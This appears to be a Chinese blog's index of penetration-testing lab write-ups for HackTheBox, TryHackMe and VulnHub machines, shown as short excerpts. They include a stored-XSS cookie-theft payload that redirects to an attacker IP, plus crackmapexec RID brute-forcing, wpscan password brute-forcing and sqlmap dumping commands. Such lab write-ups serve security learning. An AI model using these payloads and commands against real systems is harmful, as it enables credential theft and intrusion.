HTB-cat HTB-cat信息收集 22 80端口开放 然后将cat.htb添加到/etc/hosts中 扫描后台 发现git泄露 将git泄露的代码拉下来审计 发现一个xss的 username和email未经过验证就被写进数据库中,这里能写入存储型的xss 获取cookie: 1<script>document.location='http://10.10.14.68:8888 2025-02-02 Linux靶机中级 #HTB
HTB-Trickster HTB-Tricksterlinux 中等难度 信息收集端口扫描发现22和80端口开放 访问80端口 发现并不能访问它的服务 做一下映射 将域名添加到/etc/hosts中。 第一个网站扫后台扫到了一个assets 没找到什么有用的信息 第二个网站是一个PrestaSHop 网上搜了大部分是sql注入漏洞 注册一个账户登录进去看看。 没啥东西,扫后台可以知道是一个git泄露 利用GitH 2025-01-25 Linux靶机中级 #HTB
HTB-Cicada HTB-Cicada信息收集 端口开放 445 利用smbclient查看一下共享资源。 在HR下 找到一个txt文件 下载下来。 漏洞利用在txt里面得到一个账户默认的密码,但是用户名并不知道,需要枚举。 1crackmapexec smb 10.10.11.35 -u "guest" -p " " --rid-brute | grep " 2025-01-17 Windows靶机初级 #HTB
ctfshow渗透赛复现 ctfshow渗透赛复现前置:我那时候只做到了第二章,第三章往后的都没做出来,主要是复现3到5章的内容,前两章的大概思路就是通过爆破,可以得到压缩包的密码,然后解一下RSA可以得到网址,账号密码的话,xxx.gxv 那个网站存在一个任意文件下载,通过wpscan api扫出来的 可以下载config.php得到初始的账号密码,然后登录进去,对jwt进行一个爆破,得到密钥,伪造身份,然后就是扫靶机的 2025-01-10 渗透比赛 #比赛复现
Empire_LupinOne Empire: LupinOne信息收集首先扫描存活主机。 得到ip地址为192.168.29.170 然后扫描端口信息,进行服务的访问。 80和22端口开放,没啥特别的漏洞,那就去扫一下后台看是否存在敏感文件。 访问/manual 会跳转到一个Apache HTTP Server Version 2.4 服务的界面。 没找到什么可以利用的漏洞,然后去访问robots.txt 可以看到有一 2025-01-02 靶机 #vulnhub
域渗透基础知识 Active Directory 基础知识Windows域当一个区域有多台计算机,难以逐个管理时,通常会将这些计算机的通用组件的管理集中在一个被称为Active Directory(AD)的存储库中,运行AD的服务器被称为DC(域控制器) 管理员通过控制AD从而控制其他计算机,并在AD中配置策略应用到网络中。 ADAD中包含很多对象,包括用户,机器,安全组,打印机等。 域中比较重要的安全组: 2024-12-03 Offensive Pentesting #tryhackme
Internal Internal信息收集:nmap扫一波 22和80端口开放 扫下后台 有一个phpadmin和wordpress的后台登录 使用wpscn扫一下看看情况 1wpscan --url "http://10.10.50.8/blog" -eu 利用wpscan爆破密码 1wpscan --url "http://10.10.50.8/blog" -U 2024-11-28 Offensive Pentesting #tryhackme
Daily Bugle Daily Bugle扫了一下 22 80 3306端口开启 访问README.txt 可以得到版本号 是3.7.0 找到一个sql注入的洞 用sqlmap可以跑。但还是挺慢的。 但最后没跑出数据。 去找一下这个cve CVE-2017-8917 https://github.com/stefanlucas/Exploit-Joomla 1Found user [u'811' 2024-11-08 Offensive Pentesting #tryhackme
Skynet Skynet扫一下端口。 44 80 22 等端口开放,看下80端口。 扫下后台找到登录的地方,尝试爆破密码,结果没结果。 回到445端口,利用enum4linux探测一下samba服务。 用smbclient 去登录anonymous 这个是无密码的。 进入logs下有三个日志文件。 利用more命令进行查看。 只有log1.txt里面有文件。 1234567891011121314151 2024-11-08 Offensive Pentesting #tryhackme
gamezome gamezome信息收集利用-F扫了一下,发现22和80端口开放。 去访问80端口,可以看到有一个登录框。 漏洞利用尝试爆破一下密码。 好像没啥结果,抓个包,用sqlmap跑一下看看,是否存在sql注入。 存在的话,就尝试能否爆出账户和密码。 可以跑出来,但是就是太慢了。。。 1sqlmap -r 'xxxx/txt' --dbms=mysql --dump 利用jo 2024-11-04 Offensive Pentesting #tryhackme